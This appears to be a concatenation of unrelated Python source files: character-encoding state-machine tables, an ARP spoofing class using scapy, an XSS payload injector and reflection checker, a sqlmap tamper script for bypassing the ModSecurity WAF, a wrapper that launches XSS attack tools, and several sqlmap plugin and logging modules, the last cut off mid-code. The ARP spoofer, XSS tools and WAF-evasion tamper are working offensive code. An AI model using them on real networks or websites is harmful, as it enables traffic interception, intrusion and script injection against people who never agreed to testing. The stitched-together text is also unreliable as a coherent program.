    3,
    3,
    3,
    3,
    3,
    3,  # 88 - 8f
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # 90 - 97
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # 98 - 9f
    # 0xa0 is illegal in sjis encoding, but some pages does
    # contain such byte. We need to be more error forgiven.
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # a0 - a7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # a8 - af
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # b0 - b7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # b8 - bf
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # c0 - c7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # c8 - cf
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # d0 - d7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # d8 - df
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # e0 - e7
    3,
    3,
    3,
    3,
    3,
    4,
    4,
    4,  # e8 - ef
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # f0 - f7
    3,
    3,
    3,
    3,
    3,
    0,
    0,
    0,
)  # f8 - ff


SJIS_ST = (
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    3,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 00-07
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,  # 08-0f
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,  # 10-17
)

SJIS_CHAR_LEN_TABLE = (0, 1, 1, 2, 0, 0)

SJIS_SM_MODEL = {
    "class_table": SJIS_CLS,
    "class_factor": 6,
    "state_table": SJIS_ST,
    "char_len_table": SJIS_CHAR_LEN_TABLE,
    "name": "Shift_JIS",
}

# UCS2-BE

UCS2BE_CLS = (
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 00 - 07
    0,
    0,
    1,
    0,
    0,
    2,
    0,
    0,  # 08 - 0f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 10 - 17
    0,
    0,
    0,
    3,
    0,
    0,
    0,
    0,  # 18 - 1f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 20 - 27
    0,
    3,
    3,
    3,
    3,
    3,
    0,
    0,  # 28 - 2f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 30 - 37
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 38 - 3f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 40 - 47
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 48 - 4f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 50 - 57
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 58 - 5f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 60 - 67
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 68 - 6f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 70 - 77
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 78 - 7f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 80 - 87
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 88 - 8f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 90 - 97
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 98 - 9f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # a0 - a7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # a8 - af
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # b0 - b7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # b8 - bf
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # c0 - c7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # c8 - cf
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # d0 - d7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # d8 - df
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # e0 - e7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # e8 - ef
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # f0 - f7
    0,
    0,
    0,
    0,
    0,
    0,
    4,
    5,  # f8 - ff
)

UCS2BE_ST = (
    5,
    7,
    7,
    MachineState.ERROR,
    4,
    3,
    MachineState.ERROR,
    MachineState.ERROR,  # 00-07
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,  # 08-0f
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    6,
    6,
    6,
    6,
    MachineState.ERROR,
    MachineState.ERROR,  # 10-17
    6,
    6,
    6,
    6,
    6,
    MachineState.ITS_ME,
    6,
    6,  # 18-1f
    6,
    6,
    6,
    6,
    5,
    7,
    7,
    MachineState.ERROR,  # 20-27
    5,
    8,
    6,
    6,
    MachineState.ERROR,
    6,
    6,
    6,  # 28-2f
    6,
    6,
    6,
    6,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,  # 30-37
)

UCS2BE_CHAR_LEN_TABLE = (2, 2, 2, 0, 2, 2)

UCS2BE_SM_MODEL = {
    "class_table": UCS2BE_CLS,
    "class_factor": 6,
    "state_table": UCS2BE_ST,
    "char_len_table": UCS2BE_CHAR_LEN_TABLE,
    "name": "UTF-16BE",
}

# UCS2-LE

UCS2LE_CLS = (
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 00 - 07
    0,
    0,
    1,
    0,
    0,
    2,
    0,
    0,  # 08 - 0f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 10 - 17
    0,
    0,
    0,
    3,
    0,
    0,
    0,
    0,  # 18 - 1f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 20 - 27
    0,
    3,
    3,
    3,
    3,
    3,
    0,
    0,  # 28 - 2f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 30 - 37
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 38 - 3f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 40 - 47
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 48 - 4f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 50 - 57
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 58 - 5f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 60 - 67
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 68 - 6f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 70 - 77
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 78 - 7f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 80 - 87
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 88 - 8f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 90 - 97
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 98 - 9f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # a0 - a7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # a8 - af
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # b0 - b7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # b8 - bf
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # c0 - c7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # c8 - cf
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # d0 - d7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # d8 - df
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # e0 - e7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # e8 - ef
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # f0 - f7
    0,
    0,
    0,
    0,
    0,
    0,
    4,
    5,  # f8 - ff
)

UCS2LE_ST = (
    6,
    6,
    7,
    6,
    4,
    3,
    MachineState.ERROR,
    MachineState.ERROR,  # 00-07
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,  # 08-0f
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    5,
    5,
    5,
    MachineState.ERROR,
    MachineState.ITS_ME,
    MachineState.ERROR,  # 10-17
    5,
    5,
    5,
    MachineState.ERROR,
    5,
    MachineState.ERROR,
    6,
    6,  # 18-1f
    7,
    6,
    8,
    8,
    5,
    5,
    5,
    MachineState.ERROR,  # 20-27
    5,
    5,
    5,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    5,
    5,  # 28-2f
    5,
    5,
    5,
    MachineState.ERROR,
    5,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,  # 30-37
)

UCS2LE_CHAR_LEN_TABLE = (2, 2, 2, 2, 2, 2)

UCS2LE_SM_MODEL = {
    "class_table": UCS2LE_CLS,
    "class_factor": 6,
    "state_table": UCS2LE_ST,
    "char_len_table": UCS2LE_CHAR_LEN_TABLE,
    "name": "UTF-16LE",
}

# UTF-8

UTF8_CLS = (
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 00 - 07  #allow 0x00 as a legal value
    1,
    1,
    1,
    1,
    1,
    1,
    0,
    0,  # 08 - 0f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 10 - 17
    1,
    1,
    1,
    0,
    1,
    1,
    1,
    1,  # 18 - 1f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 20 - 27
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 28 - 2f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 30 - 37
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 38 - 3f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 40 - 47
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 48 - 4f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 50 - 57
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 58 - 5f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 60 - 67
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 68 - 6f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 70 - 77
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 78 - 7f
    2,
    2,
    2,
    2,
    3,
    3,
    3,
    3,  # 80 - 87
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 88 - 8f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 90 - 97
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 98 - 9f
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,  # a0 - a7
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,  # a8 - af
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,  # b0 - b7
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,  # b8 - bf
    0,
    0,
    6,
    6,
    6,
    6,
    6,
    6,  # c0 - c7
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # c8 - cf
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # d0 - d7
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # d8 - df
    7,
    8,
    8,
    8,
    8,
    8,
    8,
    8,  # e0 - e7
    8,
    8,
    8,
    8,
    8,
    9,
    8,
    8,  # e8 - ef
    10,
    11,
    11,
    11,
    11,
    11,
    11,
    11,  # f0 - f7
    12,
    13,
    13,
    13,
    14,
    15,
    0,
    0,  # f8 - ff
)

UTF8_ST = (
    MachineState.ERROR,
    MachineState.START,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    12,
    10,  # 00-07
    9,
    11,
    8,
    7,
    6,
    5,
    4,
    3,  # 08-0f
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 10-17
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 18-1f
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,  # 20-27
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,  # 28-2f
    MachineState.ERROR,
    MachineState.ERROR,
    5,
    5,
    5,
    5,
    MachineState.ERROR,
    MachineState.ERROR,  # 30-37
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 38-3f
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    5,
    5,
    5,
    MachineState.ERROR,
    MachineState.ERROR,  # 40-47
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 48-4f
    MachineState.ERROR,
    MachineState.ERROR,
    7,
    7,
    7,
    7,
    MachineState.ERROR,
    MachineState.ERROR,  # 50-57
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 58-5f
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    7,
    7,
    MachineState.ERROR,
    MachineState.ERROR,  # 60-67
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 68-6f
    MachineState.ERROR,
    MachineState.ERROR,
    9,
    9,
    9,
    9,
    MachineState.ERROR,
    MachineState.ERROR,  # 70-77
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 78-7f
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    9,
    MachineState.ERROR,
    MachineState.ERROR,  # 80-87
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 88-8f
    MachineState.ERROR,
    MachineState.ERROR,
    12,
    12,
    12,
    12,
    MachineState.ERROR,
    MachineState.ERROR,  # 90-97
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 98-9f
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    12,
    MachineState.ERROR,
    MachineState.ERROR,  # a0-a7
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # a8-af
    MachineState.ERROR,
    MachineState.ERROR,
    12,
    12,
    12,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # b0-b7
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # b8-bf
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.ERROR,
    MachineState.ERROR,  # c0-c7
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # c8-cf
)

UTF8_CHAR_LEN_TABLE = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6)

UTF8_SM_MODEL = {
    "class_table": UTF8_CLS,
    "class_factor": 16,
    "state_table": UTF8_ST,
    "char_len_table": UTF8_CHAR_LEN_TABLE,
    "name": "UTF-8",
}



import time
from scapy.all import ARP, Ether, srp, send


class ARPSpoof:
    def __init__(self, target_ip, spoof_ip):
        self.target_ip = target_ip
        self.spoof_ip = spoof_ip

    def get_mac(self, ip):
        responses, unanswered = srp(
            Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=2, retry=10
        )
        for s, r in responses:
            print(r[Ether].src)
            return r[Ether].src
        return None

    def spoof(self):
        target_mac = self.get_mac(self.target_ip)
        if target_mac is None:
            print("Could not find MAC address for target. Exiting.")
            return

        spoof_mac = self.get_mac(self.spoof_ip)
        if spoof_mac is None:
            print("Could not find MAC address for spoof IP. Exiting.")
            return

        packet = ARP(op=2, pdst=self.target_ip, hwdst=target_mac, psrc=self.spoof_ip)

        print("Sending spoofed ARP replies...")

        try:
            while True:
                send(packet)
                time.sleep(2)
        except KeyboardInterrupt:
            print("\nARP spoofing stopped. Restoring network...")
            self.restore_network(self.target_ip, target_mac, self.spoof_ip, spoof_mac)

    def restore_network(self, target_ip, target_mac, host_ip, host_mac):
        packet = ARP(
            op=2, pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac
        )
        send(packet)



import re
import time
import textwrap

import requests

import lib.settings
import lib.formatter


class Requester(object):
    def __init__(self, url, script, headers=None, proxy=None, **kwargs):
        self.url = url
        self.script = script
        self.original_url = url
        self.headers = headers if headers is not None else lib.settings.HEADERS
        self.proxy = {"http": proxy, "https": proxy} if proxy is not None else {}
        self.throttle = kwargs.get("throttle", 0)
        self.timeout = kwargs.get("timeout", 7)

    def load_url(self, prefix, suffix, marker=False):
        if not marker:
            return self.url + prefix + self.script + suffix
        else:
            marker_index = self.url.index("*")
            self.url = (
                self.url[:marker_index]
                + prefix
                + self.script
                + suffix
                + self.url[marker_index:]
            )
            return self.url.replace("*", "")

    def make_request(self, marker=False, prefix="", suffix=""):
        retval = {}
        try:
            time.sleep(self.throttle)
            self.url = self.load_url(marker=marker, prefix=prefix, suffix=suffix)
            req = requests.get(
                self.url, timeout=self.timeout, headers=self.headers, proxies=self.proxy
            )
            content = req.text
            retval[self.script] = content
        except Exception:
            retval[self.script] = None
        return retval

    @staticmethod
    def check_for_script(
        responses, verification_amount=10, total_amount_to_find=10, test_time=35
    ):
        retval = set()
        parts_in_script = 0
        start_time = time.time()
        while len(retval) != total_amount_to_find:
            if time.time() - start_time > test_time:
                lib.formatter.warning("times up dumping found")
                break
            else:
                if len(retval) == total_amount_to_find:
                    lib.formatter.info("found requested amount of payloads dumping")
                    break
            for item in responses:
                for key, value in item.items():
                    if value is not None:
                        try:
                            key_parts = textwrap.wrap(key, len(key) // 8)
                            for part in key_parts:
                                issue_fixers = {
                                    ")": r"\)",
                                    "(": "\(",
                                    "[": r"\[",
                                    "]": r"\]",
                                    "\\": r"\\",
                                    "/*/": r"\/*\/",
                                    "((": "\(\(",
                                    "+": "\+",
                                    "*": r"\*",
                                    "/": r"\/",
                                    "%0a": r"(\r\n|\r|\n)",
                                }
                                identifiers = issue_fixers.keys()
                                to_use = ""
                                for c in part:
                                    if c in identifiers:
                                        c = issue_fixers[c]
                                    to_use += c
                                try:
                                    regex = re.compile(to_use, re.I)
                                    if regex.search(value):
                                        parts_in_script += 1
                                    if parts_in_script <= verification_amount:
                                        retval.add(key)
                                except re.error:
                                    pass
                        except ValueError:
                            pass
        return retval

    def check_for_sanitize(self):
        script = '<`"">'
        regex_script = ""
        change_dict = {"<": "&lt;", '"': "&quot;", ">": "&gt;"}
        for c in script:
            if c in change_dict.keys():
                c = change_dict[c]
            regex_script += c
        regex_script = re.compile(regex_script)
        try:
            url = self.original_url + script
            req = requests.get(
                url, timeout=self.timeout, headers=self.headers, proxies=self.proxy
            )
            content = req.content.decode("utf-8")
            if regex_script.search(content) is not None:
                return True
            else:
                return False
        except Exception:
            return None



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import os

from lib.core.common import randomInt
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHER


def dependencies():
    singleTimeWarnMessage(
        "tamper script '%s' is only meant to be run against %s"
        % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)
    )


def tamper(payload, **kwargs):
    """Embraces complete query with (MySQL) versioned comment.

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    Notes:
        * Useful to bypass ModSecurity WAF

    >>> import random
    >>> random.seed(0)
    >>> tamper('1 AND 2>1--')
    '1 /*!30963AND 2>1*/--'
    """

    retVal = payload

    if payload:
        postfix = ""
        for comment in ("#", "--", "/*"):
            if comment in payload:
                postfix = payload[payload.find(comment) :]
                payload = payload[: payload.find(comment)]
                break
        if " " in payload:
            retVal = "%s /*!30%s%s*/%s" % (
                payload[: payload.find(" ")],
                randomInt(3),
                payload[payload.find(" ") + 1 :],
                postfix,
            )

    return retVal



import requests
import logging
import os
import subprocess
from panthon.XSS.XSSCon.lib import core
from panthon.XSS.XSSCon.lib.crawler.crawler import *
from panthon.XSS.XSSCon.lib.helper.Log import *
import json

logging.basicConfig(level=logging.INFO)


class XSSAttack:
    def xanxxs_attack(
        self, url, time=25, file="panthon/XSS/XanXSS/xss-payload-list.txt", amount=1
    ):
        # path_to_executable = os.path.join(os.path.dirname(__file__), "panthon/XSS/XanXSS/xanxss.py")
        current_path = os.getcwd()
        print(current_path)

        path_to_executable = f"{current_path}/panthon/XSS/XanXSS/xanxss.py"
        # base_dir = os.path.dirname(os.path.realpath(__file__))
        # file_path = os.path.join(base_dir, "XSS", "XanXSS", "xss-payload-list.txt")
        # path_to_executable = os.path.join(base_dir, "XSS", "XanXSS", "xanxss.py")
        with open(file, "r") as f:
            payloads = [line.strip() for line in f]

        command = ["python3", path_to_executable, "-u", url, "--payloads"]
        command.extend(payloads)
        command.extend(["--time", str(time)])
        command.extend(["-a", str(amount)])
        print("xanxss")
        subprocess.run(command)

    def xsscon_attack(
        self,
        url,
        depth=2,
        payloadLevel=6,
        payload=None,
        userAgent="'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'",
        single=False,
        proxy=None,
        cookie=None,
        method=2,
    ):

        print("xsscon")
        path_to_executable = os.path.join(
            os.path.dirname(__file__), "XSS/XSSCon/xsscon.py"
        )

        cookies = cookie.split(";")
        cookie_dict = {}
        for c in cookies:
            key, value = c.split("=")
            cookie_dict[key.strip()] = value.strip()

        cookie_json = json.dumps(cookie_dict)
        print(cookie_json)

        command = [
            "python3",
            path_to_executable,
            "-u",
            str(url),
            "--depth",
            str(depth),
            "--payload-level",
            str(payloadLevel),
            "--payload" if payload else "",
            str(payload) if payload else "",
            "--user-agent",
            str(userAgent),
            "--single" if single else "",
            "--proxy" if proxy else "",
            str(proxy) if proxy else "",
            "--cookie" if cookie else "",
            str("'" + cookie_json + "'") if cookie else "",
            "--method",
            str(method),
        ]

        command_str = " ".join(command)
        subprocess.run(command_str, shell=True)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

try:
    import pymysql
except:
    pass

import logging
import struct

from lib.core.common import getSafeExString
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector


class Connector(GenericConnector):
    """
    Homepage: https://github.com/PyMySQL/PyMySQL
    User guide: https://pymysql.readthedocs.io/en/latest/
    Debian package: python3-pymysql
    License: MIT

    Possible connectors: http://wiki.python.org/moin/MySQL
    """

    def connect(self):
        self.initConnection()

        try:
            self.connector = pymysql.connect(
                host=self.hostname,
                user=self.user,
                passwd=self.password,
                db=self.db,
                port=self.port,
                connect_timeout=conf.timeout,
                use_unicode=True,
            )
        except (
            pymysql.OperationalError,
            pymysql.InternalError,
            pymysql.ProgrammingError,
            struct.error,
        ) as ex:
            raise SqlmapConnectionException(getSafeExString(ex))

        self.initCursor()
        self.printConnected()

    def fetchall(self):
        try:
            return self.cursor.fetchall()
        except pymysql.ProgrammingError as ex:
            logger.log(
                logging.WARN if conf.dbmsHandler else logging.DEBUG,
                "(remote) %s" % getSafeExString(ex),
            )
            return None

    def execute(self, query):
        retVal = False

        try:
            self.cursor.execute(query)
            retVal = True
        except (pymysql.OperationalError, pymysql.ProgrammingError) as ex:
            logger.log(
                logging.WARN if conf.dbmsHandler else logging.DEBUG,
                "(remote) %s" % getSafeExString(ex),
            )
        except pymysql.InternalError as ex:
            raise SqlmapConnectionException(getSafeExString(ex))

        self.connector.commit()

        return retVal

    def select(self, query):
        retVal = None

        if self.execute(query):
            retVal = self.fetchall()

        return retVal



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from plugins.generic.syntax import Syntax as GenericSyntax


class Syntax(GenericSyntax):
    @staticmethod
    def escape(expression, quote=True):
        """
        >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar"
        True
        """

        return expression



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.connector import Connector as GenericConnector


class Connector(GenericConnector):
    def connect(self):
        errMsg = "on H2 it is not (currently) possible to establish a "
        errMsg += "direct connection"
        raise SqlmapUnsupportedFeatureException(errMsg)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import logging
import re
import sys

from lib.core.enums import CUSTOM_LOGGING

logging.addLevelName(CUSTOM_LOGGING.PAYLOAD, "PAYLOAD")
logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_OUT, "TRAFFIC OUT")
logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_IN, "TRAFFIC IN")

LOGGER = logging.getLogger("sqlmapLog")

LOGGER_HANDLER = None
try:
    from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler

    class _ColorizingStreamHandler(ColorizingStreamHandler):
        def colorize(self, message, levelno, force=False):
            if levelno in self.level_map and (self.is_tty or force):
                bg, fg, bold = self.level_map[levelno]
                params = []

                if bg in self.color_map:
                    params.append(str(self.color_map[bg] + 40))

                if fg in self.color_map:
                    params.append(str(self.color_map[fg] + 30))

                if bold:
                    params.append("1")

                if params and message:
                    match = re.search(r"\A(\s+)", message)
                    prefix = match.group(1) if match else ""
                    message = message[len(prefix) :]

                    match = re.search(r"\[([A-Z ]+)\]", message)  # log level
                    if match:
                        level = match.group(1)
                        if message.startswith(self.bold):
                            message = message.replace(self.bold, "")
                            reset = self.reset + self.bold
                            params.append("1")
                        else:
                            reset = self.reset
                        message = message.replace(
                            level,
                            "".join((self.csi, ";".join(params), "m", level, reset)),
                            1,
                        )

                        match = re.search(r"\A\s*\[([\d:]+)\]", message)  # time
                        if match:
                            time = match.group(1)
                            message = message.replace(
                                time,
                                "".join(
                                    (
                                        self.csi,
                                        str(self.color_map["cyan"] + 30),
                                        "m",
                                        time,
                                        self._reset(message),
                                    )
                                ),
                                1,
                            )

                        match = re.search(r"\[(#\d+)\]", message)  # counter
                        if match:
                            counter = match.group(1)
                            message = message.replace(
                                counter,
                                "".join(
                                    (
                                        self.csi,
                                        str(self.color_map["yellow"] + 30),
                                        "m",
                                        counter,
                                        self._reset(message),
                                    )
                                ),
                                1,
                            )

                        if level != "PAYLOAD":
                            if any(
                                _ in message for _ in ("parsed DBMS error message",)
                            ):
                                match = re.search(r": '(.+)'", message)
                                if match:
                                    string = match.group(1)
                                    message = message.replace(
                                        "'%s'" % string,
                                        "'%s'"
                                        % "".join(
                                            (
                                                self.csi,
                                                str(self.color_map["white"] + 30),
                                                "m",
                                                string,
                                                self._reset(message),
                                            )
                                        ),
                                        1,
                                    )
                            else:
                                match = re.search(r"\bresumed: '(.+\.\.\.)", message)
                                if match:
                                    string = match.group(1)
                                    message = message.replace(
                                        "'%s" % string,
                                        "'%s"
                                        % "".join(
                                            (
